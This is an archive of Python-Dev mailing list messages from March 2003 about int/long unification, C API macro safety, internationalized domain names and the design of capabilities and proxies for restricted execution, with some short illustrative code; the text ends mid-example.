$ /usr/local/pydebug/bin/python
Python 2.3a2+ (#1, Feb 24 2003, 15:02:10)
[GCC 3.2 20020927 (prerelease)] on cygwin
Type "help", "copyright", "credits" or "license" for more information.
>>> import sys
[17514 refs]
>>> int(sys.maxint * 2)
4294967294L
[17613 refs]
>>>
-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com


From tim.one@comcast.net  Sat Mar  8 04:06:53 2003
From: tim.one@comcast.net (Tim Peters)
Date: Fri, 07 Mar 2003 23:06:53 -0500
Subject: [Python-Dev] [2.3a2+] Change in int() behavior
In-Reply-To: <u1y1isjet.fsf@boost-consulting.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCOELAEAAB.tim.one@comcast.net>

[David Abrahams]
> The following change in behavior is causing one of my tests to fail.

Dear Lord, another buggy test <wink>.

> Is it intentional?

Yes, as part of the ongoing push toward int/long unification.  If you tried
the same test in Python 2.1, it would have blown up in the "sys.maxint * 2"
part.  In 2.2, it blows up in the "int()" part.  In 2.3, it doesn't blow up
at all.  In 2.4 or 2.5, __builtin__.int and __builtin__.long may well be the
same object.

> Should isinstance(int(x),int) really ever return False?

In 2.3, yes (albeit unfortunately).

> Python 2.2.2 (#1, Feb  3 2003, 14:10:37)
> >>> int(sys.maxint * 2)
> Traceback (most recent call last):
>   File "<stdin>", line 1, in ?
> OverflowError: long int too large to convert to int

> Python 2.3a2+ (#1, Feb 24 2003, 15:02:10)
> >>> int(sys.maxint * 2)
> 4294967294L

Adding one more:

Python 2.1.3 (#35, Apr  8 2002, 17:47:50) [MSC 32 bit (Intel)] on win32
>>> int(sys.maxint * 2)
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
OverflowError: integer multiplication
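
For comparison, a sketch of the same experiment on Python 3, where int and
long ended up as a single type.  This assumes a Python 3 interpreter;
sys.maxsize stands in for sys.maxint, which no longer exists there.

```python
import sys

# Neither the multiplication nor the int() call overflows.
big = int(sys.maxsize * 2)

# With one integer type, the isinstance question from the thread goes away.
same_type = isinstance(big, int)
```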


From dave@boost-consulting.com  Sat Mar  8 05:27:07 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Sat, 08 Mar 2003 00:27:07 -0500
Subject: [Python-Dev] [2.3a2+] Change in int() behavior
In-Reply-To: <LNBBLJKPBEHFEDALKOLCOELAEAAB.tim.one@comcast.net> (Tim
 Peters's message of "Fri, 07 Mar 2003 23:06:53 -0500")
References: <LNBBLJKPBEHFEDALKOLCOELAEAAB.tim.one@comcast.net>
Message-ID: <uel5iqvh0.fsf@boost-consulting.com>

Tim Peters <tim.one@comcast.net> writes:

> [David Abrahams]
>> The following change in behavior is causing one of my tests to fail.
>
> Dear Lord, another buggy test <wink>.
>
>> Is it intentional?
>
> Yes, as part of the ongoing push toward int/long unification.  If you tried
> the same test in Python 2.1, it would have blown up in the "sys.maxint * 2"
> part.  In 2.2, it blows up in the "int()" part.  In 2.3, it doesn't blow up
> at all.  In 2.4 or 2.5, __builtin__.int and __builtin__.long may well be the
> same object.

Yes, but in the meantime, PyInt_AS_LONG( invoke_int_conversion(x) )
might be a crash instead of raising an exception.  That's what is
causing my test to fail.  I guess I just need to lowercase a few
characters, but it's worth noting that this change breaks existing
extension module code.

-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com


From tim.one@comcast.net  Sat Mar  8 06:28:54 2003
From: tim.one@comcast.net (Tim Peters)
Date: Sat, 08 Mar 2003 01:28:54 -0500
Subject: [Python-Dev] [2.3a2+] Change in int() behavior
In-Reply-To: <uel5iqvh0.fsf@boost-consulting.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCCELIEAAB.tim.one@comcast.net>

[David Abrahams]
> Yes, but in the meantime, PyInt_AS_LONG( invoke_int_conversion(x) )
> might be a crash instead of raising an exception.

As the comment before that macro's definition says,

/* Macro, trading safety for speed */

PyInt_AsLong() won't crash, but its result needs to be checked for an error
return.

Note that your example:

    PyInt_AS_LONG( invoke_int_conversion(x) )

wasn't safe before either:  I'm not sure what invoke_int_conversion(x) means
exactly, but the plausible meanings I can think of for it *could* yield a
NULL pointer, or a pointer to a non-int object, in any version of Python
(e.g., PyNumber_Int() calls tp_as_number->nb_int but doesn't check the
return value for sanity).  In either of those cases PyInt_AS_LONG blindly
applied to the result could crash.


> That's what is causing my test to fail.  I guess I just need to lowercase
> a few characters,

You also need to check for an error return -- PyInt_AsLong() can fail.

> but it's worth noting that this change breaks existing
> extension module code.

I'm not sure it can break any I wouldn't have considered broken before.
It's normal (& expected) not to use the macro unless you *know* you've got
an int object, usually by virtue of passing a PyInt_Check() test first.


From dave@boost-consulting.com  Sat Mar  8 07:27:26 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Sat, 08 Mar 2003 02:27:26 -0500
Subject: [Python-Dev] [2.3a2+] Change in int() behavior
In-Reply-To: <LNBBLJKPBEHFEDALKOLCCELIEAAB.tim.one@comcast.net> (Tim
 Peters's message of "Sat, 08 Mar 2003 01:28:54 -0500")
References: <LNBBLJKPBEHFEDALKOLCCELIEAAB.tim.one@comcast.net>
Message-ID: <u8yvqqpwh.fsf@boost-consulting.com>

Tim Peters <tim.one@comcast.net> writes:

> [David Abrahams]
>> Yes, but in the meantime, PyInt_AS_LONG( invoke_int_conversion(x) )
>> might be a crash instead of raising an exception.
>
> As the comment before that macro's definition says,
>
> /* Macro, trading safety for speed */
>
> PyInt_AsLong() won't crash, but its result needs to be checked for an error
> return.
>
> Note that your example:
>
>     PyInt_AS_LONG( invoke_int_conversion(x) )
>
> wasn't safe before either:  I'm not sure what invoke_int_conversion(x) means
> exactly, but the plausible meanings I can think of for it *could* yield a
> NULL pointer, or a pointer to a non-int object, in any version of
> Python

Yeah, actually invoke_int_conversion basically invoked the nb_int
slot, and I _was_ doing the NULL check (don't forget, C++ has
exceptions).

> (e.g., PyNumber_Int() calls tp_as_number->nb_int but doesn't check the
> return value for sanity).  In either of those cases PyInt_AS_LONG blindly
> applied to the result could crash.
>
>
>> That's what is causing my test to fail.  I guess I just need to lowercase
>> a few characters,
>
> You also need to check for an error return -- PyInt_AsLong() can fail.

I knew that, but thanks.  I was exaggerating for effect; did it, it
works.

>> but it's worth noting that this change breaks existing
>> extension module code.
>
> I'm not sure it can break any I wouldn't have considered broken before.
> It's normal (& expected) not to use the macro unless you *know* you've got
> an int object, usually by virtue of passing a PyInt_Check() test first.

I guess I was reading
http://www.python.org/doc/current/ref/numeric-types.html#l2h-184 a
little too strongly when I wrote the code:

    __complex__(self) 

    __int__(self) 

    __long__(self) 

    __float__(self) 

    Called to implement the built-in functions complex() int() long()
    and float(). Should return a value of the appropriate type.
                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

That's pretty weak language, and even if it were strong I should've
known better.  Some joker would eventually add an __int__ method,
that returns, say, a Long.  I just didn't expect it to happen in the
core (for some reason).
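
To make the defensive habit concrete, here is a minimal sketch in
present-day Python 3 (not the 2.3 C API discussed above).  The names
checked_int and Joker are hypothetical; the point is only that the result
of a user-supplied __int__ is validated before it is trusted, much as a
PyInt_Check() test guards PyInt_AS_LONG:

```python
class Joker:
    """Hypothetical class whose __int__ returns the wrong type."""

    def __int__(self):
        return "3"  # a str, not an int


def checked_int(obj):
    """Call obj.__int__() and verify the result before using it."""
    value = obj.__int__()
    if not isinstance(value, int):
        raise TypeError("__int__ returned non-int: %r" % type(value).__name__)
    return value


print(checked_int(7))  # 7
try:
    checked_int(Joker())
except TypeError as exc:
    print("rejected:", exc)
```

The check costs one isinstance() call; skipping it is the moral equivalent
of applying the unchecked macro to an arbitrary object.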

-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com


From newsgroups1@bitfurnace.com  Sat Mar  8 08:26:13 2003
From: newsgroups1@bitfurnace.com (Damien Morton)
Date: Sat, 8 Mar 2003 03:26:13 -0500
Subject: [Python-Dev] acceptability of asm in python code?
Message-ID: <b4c9pk$4tu$1@main.gmane.org>

In the BINARY_ADD opcode, and in most arithmetic opcodes, there is a line
that checks for overflow that looks like this:

if ((i^a) < 0 && (i^b) < 0) goto slow_add;

I got a small speedup by replacing this with a macro defined thusly:

#if defined(_MSC_VER) and defined(_M_IX86)
#define IF_OVERFLOW_GOTO(X) __asm { jo X };
#else
#define IF_OVERFLOW_GOTO(X) if ((i^a) < 0 && (i^b) < 0) goto X;
#endif

Would this case be an acceptable use of snippets of inline assembler?
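
For readers unfamiliar with the xor test quoted above, here is a minimal
sketch of what it computes, written in Python rather than C and assuming
32-bit signed arithmetic.  The names wrap32 and add_overflows are
illustrative only and do not appear in ceval.c:

```python
def wrap32(n):
    """Reduce n to a signed 32-bit two's-complement value (assumed word size)."""
    n &= 0xFFFFFFFF
    return n - 0x100000000 if n & 0x80000000 else n


def add_overflows(a, b):
    """Mirror of the C test (i^a) < 0 && (i^b) < 0, where i is the wrapped sum."""
    i = wrap32(a + b)
    # i ^ x is negative exactly when i and x differ in sign, so the test
    # fires only when the result's sign differs from both operands' signs.
    return (i ^ a) < 0 and (i ^ b) < 0


INT_MAX = 2**31 - 1
INT_MIN = -2**31
print(add_overflows(INT_MAX, 1))   # True
print(add_overflows(INT_MIN, -1))  # True
print(add_overflows(-5, 3))        # False
print(add_overflows(1, 2))         # False
```

The "jo" instruction reads the same information from the CPU's overflow
flag instead of recomputing it from the operands.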


From martin@v.loewis.de  Sat Mar  8 11:43:22 2003
From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: Sat, 8 Mar 2003 12:43:22 +0100
Subject: [Python-Dev] Internationalizing domain names
Message-ID: <200303081143.h28BhMTQ002892@mira.informatik.hu-berlin.de>

IETF has recently published a series of RFCs to support non-ASCII
characters in domain names. This is called IDNA, Internationalizing
domain names in applications. It works by applications converting
Unicode domain names into ASCII ones (using an ACE, ASCII compatible
encoding), which are then sent to the DNS.

I have implemented this technology for Python, and would like to see
it included in Python 2.3. It consists of the following pieces:
- Tools/unicode/mkstringprep.py, which generates Lib/stringprep.py
  from the source of RFC 3454,
- Lib/encodings/punycode.py, patch 632643, implementing RFC 3492,
- Lib/encodings/idna.py, implementing both RFC 3491 (nameprep)
  and RFC 3490 (idna)
- modifications to the socket module, to accept Unicode for host
  names, and convert it using IDNA.
- various test cases

Changes to httplib, ftplib, etc are not necessary, as they just pass
the host names through to the socket calls.
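
As an illustration of the conversion described above, here is a minimal
sketch assuming a current Python 3 in which the codecs are available under
the names "idna" and "punycode".  The host name is a made-up example:

```python
# A Unicode host name containing a non-ASCII character (u-umlaut).
host = "b\u00fccher.example"

# The "idna" codec applies nameprep and the ACE conversion label by label.
ace = host.encode("idna")
print(ace)                         # b'xn--bcher-kva.example'

# Decoding reverses the conversion.
print(ace.decode("idna") == host)  # True

# The "punycode" codec handles a single label, without the "xn--" prefix.
print("b\u00fccher".encode("punycode"))  # b'bcher-kva'
```

Only the label that contains non-ASCII characters is rewritten; the plain
ASCII label passes through unchanged.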

I have no changes to the urllib* modules, as the work on IRIs
(internationalized resource identifiers) is still in progress. As a
result, if one puts non-ASCII into just the hostname part of a URL,
urllib will do the right thing; urllib2 will complain about the
non-ASCII characters.

Would anybody like to review these changes?

Regards,
Martin


From ben@algroup.co.uk  Sat Mar  8 12:27:40 2003
From: ben@algroup.co.uk (Ben Laurie)
Date: Sat, 08 Mar 2003 12:27:40 +0000
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: <200303071741.h27HfGb23015@pcp02138704pcs.reston01.va.comcast.net>
References: <200303071741.h27HfGb23015@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <3E69E1BC.5090508@algroup.co.uk>

Guido van Rossum wrote:
> [Moving a discussion about capabilities to where it arguably belongs]
> 
> [Ben Laurie]
> 
>>The point about capabilities is that mere possession of a capability is 
>>all that is required to exercise it. If you start adding security 
>>checkers to them, then you don't have capabilities anymore. But the 
>>point is somewhat deeper than that - given capabilities, you can
>>implement proxies without requiring any more infrastructure - you can 
>>also implement security schemes that don't really correspond to any kind 
>>of security checking at all (ok, you can probably find some convoluted 
>>way to achieve the same effect, but I'll bet it comes down to having 
>>tokens that correspond to proxies, and security checkers that allow you 
>>to proceed if you have the appropriate token - in other words, 
>>capabilities, but very hard to use).
>>
>>So, it seems to me, it's simpler and more powerful to start with
>>capabilities and build proxies on top of them (or whatever alternate 
>>scheme you want to build).
>>
>>Once more, my apologies for not just getting straight to the point.
>>
>>BTW, if you would like to explain why you don't think bound methods are 
>>the way to go on python-dev, I'd love to hear it.
> 
> 
> It seems to be a matter of convenience.  Often objects have many
> methods to which you want to provide access as a group.  E.g. I might
> have a service configuration registry object.  The object behaves
> roughly like a dictionary.  A certain user may be given read-only
> access to the registry.  Using capabilities, I would have to hand her
> a bunch of capabilities for various methods: __getitem__, has_key,
> get, keys, items, values, and many more.  Using proxies I can simply
> give her a read-only proxy for the object.  So proxies are more
> powerful.
> 
> Before you start saying that we should use capabilities as the more
> fundamental mechanism and build proxies on top of that: as you point
> out, we already have an equivalent more fundamental mechanism, bound
> methods, which is equivalent to capabilities.  It's just that raw
> capabilities aren't very usable, so one way or another we've got to
> build something on top of that.

I'm not trying to persuade you that capabilities are better than 
proxies. I'd prefer to build on them, and it seems you'd prefer to do it 
another way. That's fine with me - my goal is to make capabilities both 
possible and easily usable in Python, not to persuade everyone to use 
them (yet ;-).

Bound methods are not capabilities unless they are secured. It seems the 
correct way to do this is to use restricted execution, and perhaps some 
other tricks. What I am trying to nail down is exactly what needs doing 
to get us from where we are now to where capabilities actually work. As 
I understand it, what is needed is:

a) Fix restricted execution, which is in a state of disrepair

b) Override import, open (and other stuff? what?)

c) Wrap or replace some of the existing libraries, certify that others 
are "safe"

It looks to me like a and b are shared with proxies, and c would be 
different, by definition. Is there anything else? Am I on the wrong track?
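
To illustrate why an unsecured bound method is not yet a capability, here
is a minimal sketch in present-day Python 3.  The Registry class and its
method names are hypothetical; __self__ is the standard attribute that a
bound method uses to refer to its instance:

```python
class Registry:
    """Hypothetical configuration registry with read and write methods."""

    def __init__(self, data):
        self._data = dict(data)

    def get(self, key, default=None):
        return self._data.get(key, default)

    def set(self, key, value):
        self._data[key] = value


registry = Registry({"port": 8080})

# Hand out only the read method, intending it as a read-only capability.
read_cap = registry.get
print(read_cap("port"))  # 8080

# Without restricted execution, the holder can walk back to the instance
# and use methods that were never handed out.
owner = read_cap.__self__
owner.set("port", 1)
print(read_cap("port"))  # 1
```

Securing bound methods therefore means, at the least, denying untrusted
code this kind of reflective access.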

I am going to write this all up into a document which can be used as a 
starting point for work to complete this.

Cheers,

Ben.

-- 
http://www.apache-ssl.org/ben.html       http://www.thebunker.net/

"There is no limit to what a man can do or how far he can go if he
doesn't mind who gets the credit." - Robert Woodruff


From guido@python.org  Sat Mar  8 13:29:58 2003
From: guido@python.org (Guido van Rossum)
Date: Sat, 08 Mar 2003 08:29:58 -0500
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: "Your message of Sat, 08 Mar 2003 12:27:40 GMT."
 <3E69E1BC.5090508@algroup.co.uk>
References: <200303071741.h27HfGb23015@pcp02138704pcs.reston01.va.comcast.net>
 <3E69E1BC.5090508@algroup.co.uk>
Message-ID: <200303081329.h28DTw527129@pcp02138704pcs.reston01.va.comcast.net>

> What I am trying to nail down is exactly what needs doing to get us
> from where we are now to where capabilities actually work. As I
> understand it, what is needed is:
> 
> a) Fix restricted execution, which is in a state of disrepair

Yes.

> b) Override import, open (and other stuff? what?)

Don't worry about this; it's taken care of by the rexec module; each
application will probably want to do this a little differently
(certainly Zope has its own way).

> c) Wrap or replace some of the existing libraries, certify that others 
> are "safe"

This should only be necessary for (core and 3rd party) extension
modules.  The rexec module has a framework for this.

> It looks to me like a and b are shared with proxies, and c would be 
> different, by definition. Is there anything else? Am I on the wrong track?

I don't know why you think (c) is different.

> I am going to write this all up into a document which can be used as a 
> starting point for work to complete this.

Excellent.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From pedronis@bluewin.ch  Sat Mar  8 12:50:50 2003
From: pedronis@bluewin.ch (Samuele Pedroni)
Date: Sat, 8 Mar 2003 13:50:50 +0100
Subject: [Python-Dev] Re: Capabilities
References: <200303071741.h27HfGb23015@pcp02138704pcs.reston01.va.comcast.net> <3E69E1BC.5090508@algroup.co.uk>
Message-ID: <013201c2e571$596d5dc0$6d94fea9@newmexico>

From: "Ben Laurie" <ben@algroup.co.uk>
> Guido van Rossum wrote:
> > [Moving a discussion about capabilities to where it arguably belongs]
> >
> > [Ben Laurie]
> >
> >>The point about capabilities is that mere possession of a capability is
> >>all that is required to exercise it. If you start adding security
> >>checkers to them, then you don't have capabilities anymore. But the
> >>point is somewhat deeper than that - given capabilities, you can
> >>implement proxies without requiring any more infrastructure - you can
> >>also implement security schemes that don't really correspond to any kind
> >>of security checking at all (ok, you can probably find some convoluted
> >>way to achieve the same effect, but I'll bet it comes down to having
> >>tokens that correspond to proxies, and security checkers that allow you
> >>to proceed if you have the appropriate token - in other words,
> >>capabilities, but very hard to use).
> >>
> >>So, it seems to me, it's simpler and more powerful to start with
> >>capabilities and build proxies on top of them (or whatever alternate
> >>scheme you want to build).
> >>
> >>Once more, my apologies for not just getting straight to the point.
> >>
> >>BTW, if you would like to explain why you don't think bound methods are
> >>the way to go on python-dev, I'd love to hear it.
> >
> >
> > It seems to be a matter of convenience.  Often objects have many
> > methods to which you want to provide access as a group.  E.g. I might
> > have a service configuration registry object.  The object behaves
> > roughly like a dictionary.  A certain user may be given read-only
> > access to the registry.  Using capabilities, I would have to hand her
> > a bunch of capabilities for various methods: __getitem__, has_key,
> > get, keys, items, values, and many more.  Using proxies I can simply
> > give her a read-only proxy for the object.  So proxies are more
> > powerful.
> >
> > Before you start saying that we should use capabilities as the more
> > fundamental mechanism and build proxies on top of that: as you point
> > out, we already have an equivalent more fundamental mechanism, bound
> > methods, which is equivalent to capabilities.  It's just that raw
> > capabilities aren't very usable, so one way or another we've got to
> > build something on top of that.
>
> I'm not trying to persuade you that capabilities are better than
> proxies. I'd prefer to build on them, and it seems you'd prefer to do it
> another way. That's fine with me - my goal is to make capabilities both
> possible and easily usable in Python, not to persuade everyone to use
> them (yet ;-).
>
> Bound methods are not capabilities unless they are secured. It seems the
> correct way to do this is to use restricted execution, and perhaps some
> other tricks. What I am trying to nail down is exactly what needs doing
> to get us from where we are now to where capabilities actually work. As
> I understand it, what is needed is:
>
> a) Fix restricted execution, which is in a state of disrepair
>
> b) Override import, open (and other stuff? what?)
>
> c) Wrap or replace some of the existing libraries, certify that others
> are "safe"
>
> It looks to me like a and b are shared with proxies, and c would be
> different, by definition. Is there anything else? Am I on the wrong track?

there is a difference: proxies independently cover many of the holes in
restricted execution ...

about restricted execution:

- the way a new frame acquires the default built-ins vs. installed restricted
built-ins is likely correct but needs auditing;

e.g. the last problem  fixed related to this was:

http://python.org/sf/577530

- under restricted execution some operations, in particular reflective ops, ought
to be prohibited; the code that implements this is scattered and/because these
operations share the same execution paths with "normal" ops;

so the first thing is to enumerate all that should be prohibited, or devise an
approach to security that can work with just a minimal set of guarantees
(disabled ops and/or encapsulated objects)

These were e.g. identified "problems":

http://mail.python.org/pipermail/python-dev/2002-December/031160.html
http://mail.python.org/pipermail/python-dev/2003-January/031851.html


From jepler@unpythonic.net  Sat Mar  8 14:38:44 2003
From: jepler@unpythonic.net (Jeff Epler)
Date: Sat, 8 Mar 2003 08:38:44 -0600
Subject: [Python-Dev] test_popen broken on Win2K
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHAELHFBAA.tim.one@comcast.net>
References: <BIEJKCLHCIOIHAGOKOLHAELHFBAA.tim.one@comcast.net>
Message-ID: <20030308143843.GB1025@unpythonic.net>

When I tackled this problem for a program of mine, I ended up making sure
that I always used the "short filename" form for the program to be
executed.  This way, there were no spaces in the filename and no need to
quote them.

However, the function I used to do this comes from win32<something>, so
test_popen can't use it.  Nor can Python fix this up for all users of
os.popen()

Jeff


From thomas@xs4all.net  Sat Mar  8 14:40:59 2003
From: thomas@xs4all.net (Thomas Wouters)
Date: Sat, 8 Mar 2003 15:40:59 +0100
Subject: [Python-Dev] Internationalizing domain names
In-Reply-To: <200303081143.h28BhMTQ002892@mira.informatik.hu-berlin.de>
References: <200303081143.h28BhMTQ002892@mira.informatik.hu-berlin.de>
Message-ID: <20030308144059.GI2112@xs4all.nl>

On Sat, Mar 08, 2003 at 12:43:22PM +0100, Martin v. Löwis wrote:

> Would anybody like to review these changes?

I can take a look at it, but I don't actually use IDNA, so don't consider me
an authoritative resource :)

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me
spread!


From ben@algroup.co.uk  Sat Mar  8 18:09:46 2003
From: ben@algroup.co.uk (Ben Laurie)
Date: Sat, 08 Mar 2003 18:09:46 +0000
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: <200303081329.h28DTw527129@pcp02138704pcs.reston01.va.comcast.net>
References: <200303071741.h27HfGb23015@pcp02138704pcs.reston01.va.comcast.net> <3E69E1BC.5090508@algroup.co.uk> <200303081329.h28DTw527129@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <3E6A31EA.4090609@algroup.co.uk>

Guido van Rossum wrote:
>>What I am trying to nail down is exactly what needs doing to get us
>>from where we are now to where capabilities actually work. As I
>>understand it, what is needed is:
>>
>>a) Fix restricted execution, which is in a state of disrepair
> 
> 
> Yes.
> 
> 
>>b) Override import, open (and other stuff? what?)
> 
> 
> Don't worry about this; it's taken care of by the rexec module; each
> application will probably want to do this a little differently
> (certainly Zope has its own way).

I believe I heard way back that there was a lack of confidence rexec 
overrode everything that needed overriding - or am I getting mixed up 
with restricted execution?

>>c) Wrap or replace some of the existing libraries, certify that others 
>>are "safe"
> 
> 
> This should only be necessary for (core and 3rd party) extension
> modules.  The rexec module has a framework for this.
> 
> 
>>It looks to me like a and b are shared with proxies, and c would be 
>>different, by definition. Is there anything else? Am I on the wrong track?
> 
> 
> I don't know why you think (c) is different.

Because with proxies you'd wrap with proxies, and with capabilities 
you'd wrap with capabilities. Or do you think there's a way that would 
work for both (which would, of course, be great)?

Cheers,

Ben.

-- 
http://www.apache-ssl.org/ben.html       http://www.thebunker.net/

"There is no limit to what a man can do or how far he can go if he
doesn't mind who gets the credit." - Robert Woodruff


From jeremy@alum.mit.edu  Sat Mar  8 19:05:22 2003
From: jeremy@alum.mit.edu (Jeremy Hylton)
Date: 08 Mar 2003 14:05:22 -0500
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: <3E69E1BC.5090508@algroup.co.uk>
References: <200303071741.h27HfGb23015@pcp02138704pcs.reston01.va.comcast.net>
 <3E69E1BC.5090508@algroup.co.uk>
Message-ID: <1047150320.2347.26.camel@localhost.localdomain>

On Sat, 2003-03-08 at 07:27, Ben Laurie wrote:
> Bound methods are not capabilities unless they are secured. It seems the 
> correct way to do this is to use restricted execution, and perhaps some 
> other tricks. What I am trying to nail down is exactly what needs doing 
> to get us from where we are now to where capabilities actually work. As 
> I understand it, what is needed is:
> 
> a) Fix restricted execution, which is in a state of disrepair
> 
> b) Override import, open (and other stuff? what?)
> 
> c) Wrap or replace some of the existing libraries, certify that others 
> are "safe"
> 
> It looks to me like a and b are shared with proxies, and c would be 
> different, by definition. Is there anything else? Am I on the wrong track?

I have been trying to argue, though I feel a bit muddled at times, that
the proxy approach eliminates the need for rexec and makes it possible
to build a "restricted environment" without relying on the rexec code in
the interpreter.

Any security scheme needs some kind of information hiding to guarantee
that untrusted code does not break into the representation of an object,
so that, for example, an object can be used as a capability.  I think
we've discussed two different ways to implement information hiding.

The rexec approach is to add code to the interpreter to disable certain
introspection features when running untrusted code.

The proxy approach is to wrap protected objects in proxies before
passing them to untrusted code.

I think both techniques achieve the same end, but with different
limitations.  I prefer the proxy approach because it is more self
contained.  The rexec approach requires that all developers working in
the core on introspection features be aware of security issues.  The
security kernel ends up being most of the core interpreter -- anything
that can perform introspection on objects.  The proxy approach is to create an
object that specifically disables introspection by not exposing
internals to the core.  We need to do some more careful analysis to be
sure that proxies really achieve the goal of information hiding.

I think another benefit of proxies vs. rexec is that untrusted code can
still use all of the standard introspection features when dealing with
objects it creates itself.  Code running in rexec can't use any
introspective feature, period, because all those features are disabled. 
With the proxy approach, introspection is only disabled on protected
objects.
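
A minimal sketch of the proxy idea, in present-day Python 3, using the
read-only registry example from earlier in the thread.  ReadOnlyProxy and
its parameters are hypothetical names, and this pure-Python version is an
illustration of the shape of the approach, not a secure implementation:

```python
class ReadOnlyProxy:
    """Forward only an allow-listed set of attribute names to the target."""

    def __init__(self, target, allowed_names):
        self._target = target
        self._allowed = frozenset(allowed_names)

    def __getattr__(self, name):
        # Reached only for names not found on the proxy itself.
        if name in self._allowed:
            return getattr(self._target, name)
        raise AttributeError("access to %r is not permitted" % name)


registry = {"port": 8080}
view = ReadOnlyProxy(registry, ["get", "keys", "items", "values"])
print(view.get("port"))     # 8080
print(sorted(view.keys()))  # ['port']
try:
    view.update({"port": 1})
except AttributeError as exc:
    print("blocked:", exc)
# Caveat: view._target still exposes the dict here, so real information
# hiding needs more than this sketch provides.
```

Objects that the untrusted code creates for itself are untouched by the
proxy, so ordinary introspection on them keeps working.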

> I am going to write this all up into a document which can be used as a 
> starting point for work to complete this.

It sounds like a PEP would be the right thing.  It would be nice if the
PEP could explain the rationale for a secure Python environment and then
develop (at least) the capability approach to building that
environment.  Perhaps I could chip in with some explanation of the proxy
approach.

Jeremy


From guido@python.org  Sun Mar  9 00:25:13 2003
From: guido@python.org (Guido van Rossum)
Date: Sat, 08 Mar 2003 19:25:13 -0500
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: "Your message of Sat, 08 Mar 2003 18:09:46 GMT."
 <3E6A31EA.4090609@algroup.co.uk>
References: <200303071741.h27HfGb23015@pcp02138704pcs.reston01.va.comcast.net>
 <3E69E1BC.5090508@algroup.co.uk>
 <200303081329.h28DTw527129@pcp02138704pcs.reston01.va.comcast.net>
 <3E6A31EA.4090609@algroup.co.uk>
Message-ID: <200303090025.h290PDY27718@pcp02138704pcs.reston01.va.comcast.net>

> >>b) Override import, open (and other stuff? what?)
> > 
> > Don't worry about this; it's taken care of by the rexec module; each
> > application will probably want to do this a little differently
> > (certainly Zope has its own way).
> 
> I believe I heard way back that there was a lack of confidence rexec 
> overrode everything that needed overriding - or am I getting mixed up 
> with restricted execution?

Indeed.

> >>c) Wrap or replace some of the existing libraries, certify that others 
> >>are "safe"
> > 
> > This should only be necessary for (core and 3rd party) extension
> > modules.  The rexec module has a framework for this.
> > 
> >>It looks to me like a and b are shared with proxies, and c would be 
> >>different, by definition. Is there anything else? Am I on the wrong track?
> > 
> > 
> > I don't know why you think (c) is different.
> 
> Because with proxies you'd wrap with proxies, and with capabilities 
> you'd wrap with capabilities. Or do you think there's a way that would 
> work for both (which would, of course, be great)?

OK, fair enough.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Sun Mar  9 01:00:02 2003
From: guido@python.org (Guido van Rossum)
Date: Sat, 08 Mar 2003 20:00:02 -0500
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: "Your message of 08 Mar 2003 14:05:22 EST."
 <1047150320.2347.26.camel@localhost.localdomain>
References: <200303071741.h27HfGb23015@pcp02138704pcs.reston01.va.comcast.net>
 <3E69E1BC.5090508@algroup.co.uk>
 <1047150320.2347.26.camel@localhost.localdomain>
Message-ID: <200303090100.h29102I27782@pcp02138704pcs.reston01.va.comcast.net>

[Jeremy]
> I have been trying to argue, though I feel a bit muddled at times, that
> the proxy approach eliminates the need for rexec and makes it possible
> to build a "restricted environment" without relying on the rexec code in
> the interpreter.

There's one rexec-related feature that you'll need to use though: that
all built-ins (including __import__) are loaded from the __builtins__
variable in the globals, and that there's no way to get access to the
default __builtins__ (assuming the restricted builtins override
__import__ with something that won't let you import the real sys
module, etc.).  I mention this because this is actually a larger part
of the restricted execution code than the restrictions on certain
introspections that are also part of it.  The latter are clearly not
enough, and perhaps we should drop them (*requiring* proxies or
capabilities to implement the rexec module, rather than the old and
wounded Bastion [see Samuele's posts]).  But the former (the treatment
of __builtins__) is essential.
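
The __builtins__ mechanism can be sketched as follows in present-day
Python 3.  The names guarded_import, restricted_builtins and env are
hypothetical, and on its own this is not a security boundary; it only
shows where code executed with a given globals dict finds its built-ins:

```python
def guarded_import(name, *args, **kwargs):
    """Hypothetical import hook: allow a short list of modules, refuse the rest."""
    if name in {"math"}:
        return __import__(name, *args, **kwargs)
    raise ImportError("import of %r is not allowed" % name)


# Code run with these globals sees only the built-ins listed here.
restricted_builtins = {"len": len, "range": range, "__import__": guarded_import}
env = {"__builtins__": restricted_builtins}

exec("import math\nroot = math.sqrt(25)\nn = len(range(5))", env)
print(env["root"], env["n"])  # 5.0 5

for snippet in ("import sys", "open('somefile')"):
    try:
        exec(snippet, env)
    except (ImportError, NameError) as exc:
        print(type(exc).__name__ + ":", exc)
```

The import statement is routed through the replacement __import__, and
open() is simply not found because it is absent from the restricted dict.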

Perhaps mostly unrelated, I'll also note something about proxy
implementation.  Assuming proxies are instances of a type proxy, that
type must derive from a type object.  This means that if p is a proxy,
object.__getattribute__(p, 'foo') is valid.  It will take some very
careful analysis to prove that this cannot circumvent the proxy's
safeguards.  (I believe Zope's proxies are safe.)
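
The concern can be demonstrated with a deliberately naive pure-Python
proxy (present-day Python 3).  GuardedProxy is a hypothetical class, not
Zope's implementation; the sketch only shows how calling
object.__getattribute__ directly sidesteps an overridden __getattribute__:

```python
class GuardedProxy:
    """Naive proxy that refuses every underscore-prefixed attribute."""

    def __init__(self, target):
        object.__setattr__(self, "_target", target)

    def __getattribute__(self, name):
        if name.startswith("_"):
            raise AttributeError(name)
        target = object.__getattribute__(self, "_target")
        return getattr(target, name)


p = GuardedProxy({"a": 1})
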